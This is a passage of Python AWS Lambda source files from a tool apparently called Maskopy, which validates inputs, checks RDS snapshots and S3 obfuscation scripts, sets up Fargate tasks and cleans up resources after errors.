if not 'RdsSnapshotIdentifier' in step_event and not 'RdsInstanceIdentifier' in step_event:
raise MaskopyResourceNotFoundException(
'Both snapshot identifier and rds missing')
# Check if RdsFinalSnapshotIdentifier is provided and
# if so check if it starts with ApplicationName
if (step_event.get("RdsFinalSnapshotIdentifier") and
not step_event['RdsFinalSnapshotIdentifier'].startswith(
step_event['ApplicationName'].lower())):
raise MaskopyResourceNotFoundException(
"Given final snapshot name is not valid, must start with lowercase ApplicationName.")
# Check for obfuscation run mode choices: ecs, fargate, and none.
# The default run mode is fargate.
print("ObfuscateRunMode set to fargate.")
if not step_event.get('ObfuscationScriptPath'):
raise MaskopyResourceNotFoundException(
"ObfuscationScriptPath is missing. Please check your step function inputs.")
def check_valid_resources(rds_client_local, rds_client, step_event):
"""Function to check and validation inputs in step_event dictionary.
This function does not return anything, but raises MaskopyResourceNotFoundException
if inputs do not exist or are invalid.
Args:
rds_client_local (Client): AWS RDS Client object with a local session.
rds_client (Client): AWS RDS Client object with a source account session.
step_event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
Raises:
MaskopyResourceNotFoundException: Raised if input is not found or is empty.
"""
# Check if provided RdsSnapshotIdentifier exists in source account.
# Throw an exception if not found, since we need to copy this snapshot.
engine= step_event['Engine']['Type']
snapshot_response = check_snapshot_exists(rds_client, step_event['RdsSnapshotIdentifier'],engine)
if not snapshot_response:
raise MaskopyResourceNotFoundException(
f"{step_event['RdsSnapshotIdentifier']} does not exist in source account.")
# Check if provided RdsFinalSnapshotIdentifier already exists in destination environment.
# If not provided, ignore.
if not step_event.get('RdsSnapshotIdentifier'):
if not step_event.get('RdsInstanceIdentifier'):
raise Exception("RdsSnapshotIdentifier is missing. Please check your step function inputs.")
else:
step_event['RdsSnapshotIdentifier']=get_snapshot_from_rds(rds_client, step_event.get('RdsInstanceIdentifier'),engine)
if (step_event.get('RdsFinalSnapshotIdentifier') and
check_snapshot_exists(rds_client_local,step_event['RdsFinalSnapshotIdentifier'],engine)):
raise MaskopyResourceNotFoundException("Final snapshot name already exists.")
# Check if the input, RdsParameterGroup, is a valid parameter group.
if step_event.get('RdsParameterGroup'):
check_valid_parameter_group(rds_client_local, step_event['RdsParameterGroup'],engine)
# If the DB engine is oracle, check if the input, RdsOptionGroup, is a valid option group.
if "oracle" in engine:
if not step_event.get('RdsOptionGroup'):
raise MaskopyResourceNotFoundException(
"RdsOptionGroup is missing. "
"It is required if your DBEngine is Oracle based. "
"Please check your step function inputs.")
# Check if the input, RdsOptionGroup, is a valid option group.
check_valid_option_group(rds_client_local, step_event['RdsOptionGroup'])
if "postgres" in engine:
if not step_event.get('SqlScriptList'):
raise MaskopyResourceNotFoundException(
"SqlScriptList is missing. "
"It is required if your DBEngine is Postgres based. "
"Please check your step function inputs.")
if not step_event.get('DbName'):
raise MaskopyResourceNotFoundException(
"DbName is missing. "
"It is required if your DBEngine is Postgres based. "
"Please check your step function inputs.")
# fargate mode checks if ObfuscationScriptPath has a bootstrap script.
print("Setting obfuscation mode to fargate. Checking resources.")
try:
check_if_script_path_exists(step_event.get('ObfuscationScriptPath'), engine, step_event.get('SqlScriptList'))
except MaskopyResourceNotFoundException:
print(f"Bootstrap script was not found in {step_event.get('ObfuscationScriptPath')}.")
raise
def check_snapshot_exists(rds_client, snapshot_identifier, rds_type):
"""Function to check if a snapshot exists.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier to check.
Returns:
:obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call
if snapshot exists in session, False otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if "aurora" in rds_type:
return check_snapshot_exists_cluster(rds_client, snapshot_identifier)
else:
return check_snapshot_exists_instance(rds_client, snapshot_identifier)
def check_snapshot_exists_cluster(rds_client, snapshot_identifier):
"""Function to check if a snapshot exists.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier to check.
Returns:
:obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call
if snapshot exists in session, False otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Checking DB cluster snapshot with the following name: {snapshot_identifier}')
snapshot_response = rds_client.describe_db_cluster_snapshots(
DBClusterSnapshotIdentifier=snapshot_identifier)
return snapshot_response
except rds_client.exceptions.DBSnapshotNotFoundFault as err:
return False
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the DB cluster snapshot: {err}')
#raise
return False #CHECK IF VALID OUTPUT
def check_snapshot_exists_instance(rds_client, snapshot_identifier):
"""Function to check if a snapshot exists.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier to check.
Returns:
:obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call
if snapshot exists in session, False otherwise.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Checking DB snapshot with the following name: {snapshot_identifier}')
snapshot_response = rds_client.describe_db_snapshots(
DBSnapshotIdentifier=snapshot_identifier)
return snapshot_response
except rds_client.exceptions.DBSnapshotNotFoundFault as err:
return False
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the DB snapshot: {err}')
raise
# Legacy method. No longer used since EC2 tasks are no longer used.
def check_ami_id(ami_id):
"""Function to validate AMI existence in account.
Args:
ami_id (str): AMI identifier to check for existence.
Raises:
MaskopyResourceNotFoundException: Raised if AMI is not found.
"""
print(f'Validating AmiId: {ami_id}')
ec2_client = boto3.client("ec2")
try:
ec2_client.describe_images(ImageIds=[ami_id])
print("AmiId validated.")
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(err)
raise MaskopyResourceNotFoundException("Please check your 'AmiId' input.")
def check_if_script_path_exists(obfuscation_script_path, engine, sql_script_list=None):
"""Function to check bootstrap.sh exists in obfuscation_script_path.
Args:
obfuscation_script_path (str): S3 bucket path to check.
engine (str): The engine of the RDS instance.
sql_script_list (str, optional): List of SQL files to check.
Raises:
MaskopyResourceException: Raised if S3 bucket cannot be accessed.
MaskopyResourceNotFoundException: Raised S3 bucket does not exist or
if path/'boot' prefix is not found in S3 path.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
print(f'Checking: {obfuscation_script_path}')
s3_bucket_name = obfuscation_script_path.split('/', 1)[0]
file_prefix = obfuscation_script_path.split('/', 1)[1] + '/boot'
s3_client = boto3.client('s3')
try:
if "oracle" in engine:
response = s3_client.list_objects_v2(Bucket=s3_bucket_name, Prefix=file_prefix)
if not response:
raise Exception("Please check your ObfuscationScriptPath input.")
# Check if S3 has any files that have the 'boot' prefix in the S3 path
if response.get("KeyCount") == 0:
print("Bootstrap script not found in S3 bucket. "
"Please check your ObfuscationScriptPath input.")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath input.")
for obj in response.get("Contents"):
script_name = obj.get("Key")
if not script_name:
print("Please check your ObfuscationScriptPath input")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath input.")
print(f'Found: {script_name}')
elif "postgres" in engine:
for file in sql_script_list.split(','):
print(f"Checking: {obfuscation_script_path.split('/', 1)[1]}/{file}")
if not file.endswith(".sql"):
raise Exception(f"Please check your sql_script_list input. "
f"{file} does not seem to be an sql file.")
file_prefix = f"{obfuscation_script_path.split('/', 1)[1]}/{file}"
response = s3_client.list_objects_v2(Bucket=s3_bucket_name, Prefix=file_prefix)
if not response:
raise Exception(
"Please check your ObfuscationScriptPath and SqlScriptList input.")
# Check if S3 has the files in SqlScriptList
if response.get("KeyCount") == 0:
print(f"{file} not found in S3 bucket.")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath and SqlScriptList input.")
for obj in response.get("Contents"):
script_name = obj.get("Key")
if not script_name:
print("Please check your ObfuscationScriptPath and SqlScriptList input")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath and SqlScriptList input.")
print(f'Found: {script_name}')
else:
print(f"Please check your engine type. {engine} is not supported.")
raise MaskopyResourceException(f"{engine} is not supported.")
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
if err.response['Error']['Code'] == "404":
print("The object does not exist.")
raise MaskopyResourceException("Please check your ObfuscationScriptPath input.")
def get_parameter_group(rds_client, rds_client_local, snapshot_identifier):
"""Function to get the original parameter group name of snapshot
Args:
rds_client (Client): AWS RDS Client object with source session.
rds_client_local (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier.
Returns:
str: A parameter group attached to original RDS instance of snapshot.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
snapshot = rds_client.describe_db_snapshots(DBSnapshotIdentifier=snapshot_identifier)
rds_instance = rds_client.describe_db_instances(
DBInstanceIdentifier=snapshot['DBSnapshots'][0]['DBInstanceIdentifier'])
parameter_group = (rds_instance['DBInstances'][0]
['DBParameterGroups'][0]
['DBParameterGroupName'])
check_valid_parameter_group(rds_client_local, parameter_group)
return parameter_group
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
if err.response['Error']['Code'] == 'DBInstanceNotFound':
print("Original RDS not available.")
print(err)
raise Exception("Parameter group not provided and cannot be extrapolated.")
def check_valid_parameter_group(rds_client, parameter_group_name, engine):
"""Function to check for valid parameter group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
parameter_group_name (str): The parameter group name.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return check_valid_parameter_group_cluster(rds_client, parameter_group_name)
else:
return check_valid_parameter_group_instance(rds_client, parameter_group_name)
def check_valid_parameter_group_instance(rds_client, parameter_group_name):
"""Function to check for valid parameter group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
parameter_group_name (str): The parameter group name.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
if not parameter_group_name:
raise MaskopyResourceNotFoundException("Please enter a valid RdsParameterGroup.")
print(f'Validating parameter group: {parameter_group_name}')
if not rds_client.describe_db_parameter_groups(
DBParameterGroupName=parameter_group_name):
raise MaskopyResourceNotFoundException("Please check your RdsParameterGroup.")
print(f'Validated parameter group: {parameter_group_name}')
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the parameter group: {err}')
raise
def check_valid_parameter_group_cluster(rds_client, parameter_group_name):
"""Function to check for valid parameter group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
parameter_group_name (str): The parameter group name.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
if not parameter_group_name:
raise MaskopyResourceNotFoundException("Please enter a valid RdsParameterGroup.")
print(f'Validating parameter group: {parameter_group_name}')
if not rds_client.describe_db_cluster_parameter_groups(
DBClusterParameterGroupName=parameter_group_name):
raise MaskopyResourceNotFoundException("Please check your RdsParameterGroup.")
print(f'Validated parameter group: {parameter_group_name}')
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the parameter group: {err}')
raise
def check_valid_option_group(rds_client, option_group_name):
"""Function to check for valid option group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
option_group_name (str): The option group name.
Returns:
:obj:`str`: The DB engine of the snapshot.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Validating option group: {option_group_name}')
if not rds_client.describe_option_groups(
OptionGroupName=option_group_name):
raise MaskopyResourceNotFoundException("Please check your RdsOptionGroup.")
print(f'Validated option group successfully.')
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the option group: {err}')
raise
def create_account_session(sts_client, role_arn, request_id):
"""Function to create and assume account role.
Args:
sts_client (Client): AWS STS Client object.
role_arn (str): The arn of the role to assume a session.
request_id (str): UUID for session to uniquely identify session name.
Returns:
:obj:`boto3.session.Session`:
A session of the role to be used.
"""
sts_response = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=request_id
)
return boto3.session.Session(
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken']
)
def get_snapshot_from_rds(rds_client, rds_identifier, engine):
"""Return snapshot to use based off latest snapshot from an RDS instance"""
if 'aurora' in engine:
cluster_snapshots = get_db_snapshots_cluster(rds_client, rds_identifier)
return get_latest_snapshot_identifier(cluster_snapshots,engine)
else:
instance_snapshots = get_db_snapshots_instance(rds_client, rds_identifier)
return get_latest_snapshot_identifier(instance_snapshots,engine)
def get_db_snapshots_cluster(rds_client, cluster_identifier=None, snapshot_type=None, snapshot_identifier=None):
"""Return list of snapshots from an RDS cluster"""
describe_db_snapshot_params = {}
if cluster_identifier:
describe_db_snapshot_params['DBClusterIdentifier'] = cluster_identifier
if snapshot_type:
describe_db_snapshot_params['snapshot_type'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB snapshots with the following parameters: ')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_cluster_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBClusterSnapshots']
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_cluster_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBClusterSnapshots']
return snapshots
except ClientError as err:
raise MaskopyResourceException("Could not copy snapshot: %s" % err)
def get_db_snapshots_instance(rds_client, instance_identifier=None, snapshot_type=None, snapshot_identifier=None):
"""Return list of snapshots from an RDS cluster"""
describe_db_snapshot_params = {}
if instance_identifier:
describe_db_snapshot_params['DBInstanceIdentifier'] = instance_identifier
if snapshot_type:
describe_db_snapshot_params['snapshot_type'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB snapshots with the following parameters: ')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBSnapshots']
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBSnapshots']
return snapshots
except ClientError as err:
raise MaskopyResourceException("Could not copy snapshot: %s" % err)
def get_latest_snapshot_identifier(snapshot_list, engine):
"""Return snapshot to use based off latest available snapshot from a list of snapshots"""
latest_date = None
latest_snapshot = ''
for snapshot in snapshot_list:
if not snapshot['Status'] == 'available':
continue
if latest_date is None or snapshot['SnapshotCreateTime'] > latest_date:
latest_date = snapshot['SnapshotCreateTime']
if 'aurora' in engine:
latest_snapshot = snapshot['DBClusterSnapshotIdentifier']
else:
latest_snapshot = snapshot['DBSnapshotIdentifier']
return latest_snapshot
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
class MaskopyResourceNotFoundException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource since the resource does not exist.
"""
class MaskopyResourceException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource.
"""
```
#### File: lambda/09a-CreateFargate/index.py
```python
import os
import time
import boto3
from botocore.exceptions import ClientError
ECS_CLIENT = boto3.client('ecs')
def lambda_handler(event, context):
"""Lambda handler for the ninth lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
(dict of str:str) Dictionary containing cluster and task definition names.
"""
application_name = event['ApplicationName']
timestamp = event.get('ExecutionTimestamp') or str(int(time.time()))
cluster_name = 'MASKOPY-FARGATE-CLUSTER'
task_definition_name = f'maskopy-{application_name}-{timestamp}'
task_definition_environment = [
{
'name': 'APPLICATION_NAME',
'value': application_name
},
{
'name': 'OBFUSCATION_SCRIPT_PATH',
'value': event['ObfuscationScriptPath']
},
{
'name': 'RDS_INSTANCE_IDENTIFIER',
'value': event['DestinationRestoredDatabases'][0]['DBIdentifier']['DBInstanceIdentifier']
},
{
'name': 'TIMESTAMP',
'value': timestamp
},
{
'name': 'ENGINE',
'value': event['CreatedSnapshots'][0]['Engine']
},
{
'name': 'SQL_SCRIPTS',
'value': event.get('SqlScriptList') or ''
},
{
'name': 'DB_NAME',
'value': event.get('DbName') or ''
},
{
'name': 'APP_NAME',
'value': 'springboot'
}
]
create_cluster(cluster_name)
create_log_group()
task_definition_revision = create_task_definition(
task_definition_name,
task_definition_environment,
event.get("TaskDefinitionCPU"),
event.get("TaskDefinitionMemory"),
event.get("CustomTaskImage")
)
return ({
"ClusterName": cluster_name,
"PlatformVersion": "1.4.0",
"TaskDefinition": task_definition_name + ':' + task_definition_revision
})
def create_cluster(cluster_name):
"""Function to create a cluster with cluster_name.
Args:
cluster_name (str): The name of the cluster to create.
Returns:
str: Returns the cluster name created.
Raises:
MaskopyResourceException: Raised if resource cannot be accessed
or if the execution role does not have permissions to create resource.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Cluster name is: {cluster_name}. Checking if it exists')
response = ECS_CLIENT.describe_clusters(clusters=[
cluster_name,
])
if not response.get('clusters') or response.get('clusters')[0]['status'] == 'INACTIVE':
print(f'Cluster does not exist. Creating Fargate cluster: {cluster_name}')
response = ECS_CLIENT.create_cluster(
clusterName=cluster_name
)
else:
print('Cluster already exists.')
return response
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'Failed to create Fargate cluster with error: {err}')
raise MaskopyResourceException(f'Failed to create Fargate cluster: {err}')
def create_log_group():
"""Function to create the log group for the task definition.
Raises:
MaskopyResourceException: Raised if resource cannot be accessed
or if the execution role does not have permissions to create resource.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
log_client = boto3.client("logs")
try:
log_response = log_client.describe_log_groups(
logGroupNamePrefix="/ecs/maskopy/bootstrap-logs")
if not log_response.get('logGroups'):
print('Creating log group: /ecs/maskopy/bootstrap-logs')
log_client.create_log_group(logGroupName="/ecs/maskopy/bootstrap-logs")
else:
print('/ecs/maskopy/bootstrap-logs log group already exists. Skipping creation.')
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print('Failed to create log group with error: ' + str(err))
raise MaskopyResourceException(f"Failed to create log group: {err}")
def create_task_definition(task_definition_name, task_definition_environment, cpu, memory, image=None):
"""Function to create a task definition.
Args:
task_definition_name (str): The name of the cluster to create.
task_definition_environment (:obj:`list` of :obj:`dict`):
A list of dicts that contain the environment variables for task.
image (str, optional): The name of the custom image to be used in task.
cpu (str): Cpu variable for task definition
memory (str): Memory Variable for task defintion
Returns:
str: Returns the revision number of the task created.
Raises:
MaskopyResourceException: Raised if resource cannot be accessed
or if the execution role does not have permissions to create resource.
"""
account_id = os.environ['account_id']
default_image = os.environ['default_image']
service_role = os.environ['service_role']
region = os.environ['region']
try:
# Task definition name has a limit of 255 characters.
print(f'Registering Task Definition: {task_definition_name[:255]}')
response = ECS_CLIENT.register_task_definition(
containerDefinitions=[
{
'name': task_definition_name[:255],
'image': image or default_image,
'essential': True,
'memory': 1024,
'cpu': 80,
'logConfiguration': {
'logDriver': 'awslogs',
'options': {
'awslogs-group': '/ecs/maskopy/bootstrap-logs',
'awslogs-region': region,
'awslogs-stream-prefix': 'ecs'
}
},
'environment': task_definition_environment,
'command': [
'/tmp/config-bootstrap.sh'
],
'workingDirectory': '/',
}
],
family=task_definition_name[:255],
executionRoleArn=f'arn:aws:iam::{account_id}:role/{service_role}',
taskRoleArn=f'arn:aws:iam::{account_id}:role/{service_role}',
networkMode="awsvpc",
requiresCompatibilities=["FARGATE"],
memory=memory or "2048",
cpu=cpu or "1024"
)
print(response)
return str(response['taskDefinition']['revision'])
except ClientError as err:
print(f'Failed to register Task Definition with error: {err}')
raise MaskopyResourceException(f'Failed to register Task Definition: ${err}')
class MaskopyResourceException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource.
"""
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
```
#### File: lambda/11-CheckFinalSnapshotAvailability/index.py
```python
import json
import boto3
from botocore.exceptions import ClientError
def lambda_handler(event, context):
"""Lambda handler for the eleventh lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
bool: True if final snapshots are in available state, False otherwise.
"""
completed_snapshots = []
engine=event['CreatedSnapshots'][0]['Engine']
rds_client = boto3.client("rds")
# Check availability state of the snapshots in the list of created snapshots
for snapshot in event['CreatedFinalSnapshots']:
snapshot_info = get_db_snapshots(
rds_client, engine, None, None, snapshot['SnapshotName'])
for info in snapshot_info:
if info['Status'] == 'available':
completed_snapshots.append('snapshot')
if len(completed_snapshots) == len(event['CreatedFinalSnapshots']):
return True
return False
def get_db_snapshots(rds_client, engine, instance_identifier=None,
snapshot_type=None, snapshot_identifier=None):
"""Function to query snapshots to check if snapshots are in available status
Args:
rds_client (Client): AWS RDS Client object.
instance_identifier (str, optional): RDS instance identifier string.
If specified, will list all snapshots belonging to this instance.
snapshot_type (str, optional): RDS snapshot type.
Required if snapshot is an automated snapshot.
snapshot_identifier (str, optional): RDS snapshot identifer.
Cannot be used in conjunction with instance_identifier.
Returns:
:obj:`list` of :obj:`dict`: A list of snapshots.
None if no snapshots exist with specified parameters.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return get_db_snapshots_cluster(rds_client,engine,None,None,snapshot_identifier)
else:
return get_db_snapshots_instance(rds_client,engine,None,None,snapshot_identifier)
def get_db_snapshots_cluster(rds_client, engine, instance_identifier=None,
snapshot_type=None, snapshot_identifier=None):
"""Function to query snapshots to check if snapshots are in available status
Args:
rds_client (Client): AWS RDS Client object.
engine: The DB engine of the snapshot
instance_identifier (str, optional): RDS instance identifier string.
If specified, will list all snapshots belonging to this instance.
snapshot_type (str, optional): RDS snapshot type.
Required if snapshot is an automated snapshot.
snapshot_identifier (str, optional): RDS snapshot identifer.
Cannot be used in conjunction with instance_identifier.
Returns:
:obj:`list` of :obj:`dict`: A list of snapshots.
None if no snapshots exist with specified parameters.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
describe_db_snapshot_params = {}
if instance_identifier:
describe_db_snapshot_params['DBInstanceIdentifier'] = instance_identifier
if snapshot_type:
describe_db_snapshot_params['SnapshotType'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBClusterSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB cluster snapshots with the following parameters:')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_cluster_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBClusterSnapshots']
# Paginate the rds response, if required.
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBSnapshots']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get DB Cluster Snapshots: {err}")
raise
return snapshots
def get_db_snapshots_instance(rds_client, engine, instance_identifier=None,
snapshot_type=None, snapshot_identifier=None):
"""Function to query snapshots to check if snapshots are in available status
Args:
rds_client (Client): AWS RDS Client object.
engine: The DB engine of the snapshot
instance_identifier (str, optional): RDS instance identifier string.
If specified, will list all snapshots belonging to this instance.
snapshot_type (str, optional): RDS snapshot type.
Required if snapshot is an automated snapshot.
snapshot_identifier (str, optional): RDS snapshot identifer.
Cannot be used in conjunction with instance_identifier.
Returns:
:obj:`list` of :obj:`dict`: A list of snapshots.
None if no snapshots exist with specified parameters.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
describe_db_snapshot_params = {}
if instance_identifier:
describe_db_snapshot_params['DBInstanceIdentifier'] = instance_identifier
if snapshot_type:
describe_db_snapshot_params['SnapshotType'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB snapshots with the following parameters:')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBSnapshots']
# Paginate the rds response, if required.
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBSnapshots']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get DB Snapshots: {err}")
raise
return snapshots
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
```
#### File: lambda/ErrorHandlingAndCleanup/index.py
```python
import json
import os
import time
import boto3
from botocore.exceptions import ClientError
ASG_CLIENT = boto3.client('autoscaling')
ECS_CLIENT = boto3.client('ecs')
RDS_CLIENT = boto3.client('rds')
STS_CLIENT = boto3.client('sts')
ASSUME_ROLE_ARN = os.environ['assume_role_arn']
def lambda_handler(event, context):
"""Lambda handler for the eleventh lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
:obj:`list` of :obj`dict` of str:str:
List of deleted resources and message to be sent to SQS.
"""
deleted_resources = []
# Create message to be sent to SQS
json_msg = {
"ApplicationName": event['ApplicationName'],
"State": "CRITICAL",
"SDLC": event['DestinationEnv'],
"Service": "MasKopy",
"msgDetail": (f"MasKopy process for ApplicationName: {event['ApplicationName']} "
f"for snapshotID: {event['RdsSnapshotIdentifier']}. "
f"The status is: CRITICAL.")
}
deleted_resources.append({'Message' : json.dumps(json_msg)})
session = create_account_session(
STS_CLIENT, ASSUME_ROLE_ARN, context.aws_request_id)
rds_source_client = session.client('rds')
for shared_snapshot in event.get('CreatedSnapshots', []):
if isinstance(shared_snapshot, dict):
snapshot_name = shared_snapshot.get('SnapshotName')
print(f"Deleting snapshot in source account: {snapshot_name}")
if delete_snapshot(rds_source_client, snapshot_name,event["CreatedSnapshots"][0]["Engine"]):
deleted_resources.append({'SourceSnapshot' : snapshot_name})
for destination_snapshot in event.get('CreatedDestinationSnapshots', []):
if isinstance(destination_snapshot, dict):
snapshot_name = destination_snapshot.get('SnapshotName')
print(f"Deleting snapshots in destination account: {snapshot_name}")
if delete_snapshot(RDS_CLIENT, snapshot_name,event["CreatedSnapshots"][0]["Engine"]):
deleted_resources.append({'DestinationSnapshot': snapshot_name})
for database in event.get('DestinationRestoredDatabases', []):
if 'DBIdentifier' in database and database['DBIdentifier']['DBInstanceIdentifier'].startswith('maskopy'):
print(f"Deleting RDS in destination account: {database['DBIdentifier']['DBInstanceIdentifier']}")
if delete_database(RDS_CLIENT, database,event["CreatedSnapshots"][0]["Engine"]):
deleted_resources.append({"DestinationDatabase": database['DBIdentifier']})
if event.get('ObfuscateRunMode') == 'ecs':
ecs = event.get('ecs')
if ecs:
if (ecs.get('InstanceId') and ecs.get('AsgName') and
delete_asg(ASG_CLIENT, ecs['AsgName'])):
deleted_resources.append({"Instance": ecs['InstanceId']})
deleted_resources.append({"ASG": ecs['AsgName']})
if (ecs.get('TaskDefinition') and
deregister_task_definition(ECS_CLIENT, ecs['TaskDefinition'])):
deleted_resources.append({"Task Definition": ecs['TaskDefinition']})
if (ecs.get('ClusterName') and
delete_cluster(ECS_CLIENT, ecs.get('ClusterName'), ecs.get('InstanceId'))):
deleted_resources.append({"ECS Cluster": ecs['ClusterName']})
elif not event.get('ObfuscateRunMode') or event.get('ObfuscateRunMode') == 'fargate':
fargate = event.get('fargate')
if (fargate and fargate.get('TaskDefinition') and
deregister_task_definition(ECS_CLIENT, fargate.get('TaskDefinition'))):
deleted_resources.append({"Task Definition": fargate.get('TaskDefinition')})
return deleted_resources
def delete_snapshot(rds_client, snapshot_identifier, engine):
"""Function to delete snapshot.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): RDS snapshot identifer to delete
engine: The DB engine of the snapshot
Returns:
bool: True if snapshot was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
